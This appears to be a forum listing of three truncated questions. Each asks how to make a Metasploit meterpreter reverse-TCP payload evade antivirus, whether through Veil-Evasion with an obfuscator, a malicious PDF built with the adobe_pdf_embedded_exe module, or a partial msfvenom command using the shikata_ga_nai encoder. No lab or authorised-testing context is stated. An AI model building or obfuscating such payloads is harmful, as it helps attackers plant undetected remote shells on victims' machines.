Currently, I have created a windows/meterpreter/reverse<us>tcp using Veil-Evasion. I used PEScrambler on it and 8/55 of the AVs on Virustotal find the Trojan. Does anyone else know another obfuscating tool (or something else that does the same job). When I use Hyperion over my ...more
I am trying to create a malicious pdf file using the exploit "exploit/windows/fileformat/adobe<us>pdf<us>embedded<us>exe" with the payload "windows/meterpreter/reverse<us>tcp". But all the AV's detect it so that's when I decided to try to encrypt it using msfvenom, but nothin ...more
Whenever I generate an encoded payload, I use the payload "-p windows/meterpreter/reverse-tcp", I save it as "-o filename.rb" with "-f ruby" and encoder "-e shikata-ga-nai", bad chars to avoid is "-b '/x00' ". So full code is: "msfvenom -p windows/meterpreter/reverse-tcp -e s ...more